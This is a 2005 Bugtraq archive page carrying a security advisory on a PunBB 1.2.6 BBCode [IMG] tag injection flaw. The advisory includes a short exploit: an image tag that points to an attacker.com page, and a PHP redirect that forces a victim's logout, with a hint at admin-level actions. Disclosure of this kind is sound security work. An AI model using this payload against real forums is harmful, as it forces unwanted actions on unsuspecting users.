Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PunBB BBCode IMG Tag Script Injection Vulnerability

from [y3dips] Network Security [Permanent Link]
Subject: PunBB BBCode IMG Tag Script Injection Vulnerability
Date: 29 Aug 2005 08:49:29 -0000 
ECHO_ADV_22$2005

---------------------------------------------------------------------------
            PunBB BBCode IMG Tag Script Injection Vulnerability
---------------------------------------------------------------------------

Author: y3dips
Date: August, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv22-y3dips-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Version: 1.2.6 and most likely below
url : http://punbb.org
Author: Rickard Andersson
Description:

PunBB is a fast and lightweight PHP powered discussion board. It is released 
under the GNU Public License. Its primary goal is to be a faster, smaller and 
less graphic alternative to otherwise excellent discussion boards such as 
phpBB, Invision Power Board or vBulletin. PunBB has fewer features than many 
other discussion boards, but is generally faster and outputs smaller pages.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

According to the issue that affect PHPBB discovered by easyex recently at 
http://www.securityfocus.com/bid/14555/info , so it also affected in another 
bulletin board or forum that allow BBcode such as PunBB.

The issue is due to a failure of the application to properly sanitize 
user-supplied input in bbcode '[IMG]' tags included in a message or user 
signature (if allowed , default is off) .

Successful exploitation of this vulnerability could permit the injection of 
arbitrary HTML or script code into the browser of an unsuspecting user in the 
context of the affected site.


Exploit: 
~~~~~~~~

just post a message that include

[img]http://attacker.com/yuckfou.png[/img]

yuckfou.png is a folder , and include some "index.php" file

---- index.php ----

<?php
header("Location: http://target.com/punbb1.2.6/login.php?action=out&id=2";); ?>

---- eof ------

so , user with id=2 if open the topics with attacker message include will 
automatically "logout"

maybe some other interesting in command could put in "index.php" with admin 
priveledged *_^


THATS all

Fix
~~~

Vendor allready contacted but no responses

Shoutz:

~~~~~~~



~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ waraxe , LINUX, Heintz , slimjim100 , lunix, easyex all member of waraxe

~ newbie_hacker@yahoogroups.com ,

~ #e-c-h-o & #aikmel @DALNET

Contact:
~~~~~~~~

y3dips || echo|staff 
Homepage: http://y3dips.echo.or.id/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  WASC-Articles: 'Preventing Log Evasion in IIS', contact
Next by Date:  [Full-disclosure] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability, iDEFENSE Labs
Previous by Thread:  WASC-Articles: 'Preventing Log Evasion in IIS', contact
Next by Thread:  Re: PunBB BBCode IMG Tag Script Injection Vulnerability, Aaron Horst
Indexes:  [Date] [Thread] [Top] [All Lists]